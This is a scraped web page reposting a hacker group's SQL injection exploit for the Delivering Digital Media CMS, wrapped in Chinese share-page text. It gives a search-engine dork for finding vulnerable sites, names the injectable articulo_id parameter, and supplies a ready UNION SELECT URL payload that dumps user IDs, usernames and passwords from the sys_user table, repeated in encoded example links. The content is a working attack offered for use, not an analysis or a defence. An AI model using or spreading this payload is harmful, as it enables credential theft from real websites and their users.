扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
# Title: Delivering Digital Media CMS SQL Injection Vulnerability # EDB-ID: # CVE-ID: () # OSVDB-ID: () # Author: Dr.0rYX and Cr3w-DZ # Published: # Verified: # Download Exploit Code # Download N/A N.A.S.T ALGERIAN HACKER **********************- NORTH-AFRICA SECURITY TEAM -*********************** [!]Delivering Digital Media CMS SQL Injection Vulnerability [!] Author: Dr.0rYX and Cr3w-DZ [!] MAIL: vx3@hotmail.de<mailto:vx3@hotmail.de>&Cr3w@hotmail.de<mailto:Cr3w@hotmail.de> ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.delivering.info [+] script : Delivering Digital Media CMS [+] Download : http://www.delivering.info/contacto/delivering-argentina.php (sell script) [+] Vulnerability : php SQL injection [+] Dork :inurl:"index.php?edicion_id=" **************************************************************************/ [ Vulnerable File ] http://server/[PATH]/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ] http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ] [ Exploit ] http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user-- [GReets ] [+] :claw ,harD , exploit-db.com , ALL HACKERS MUSLIMS EXAMPL:http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user-- http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user-- |
体验盒子
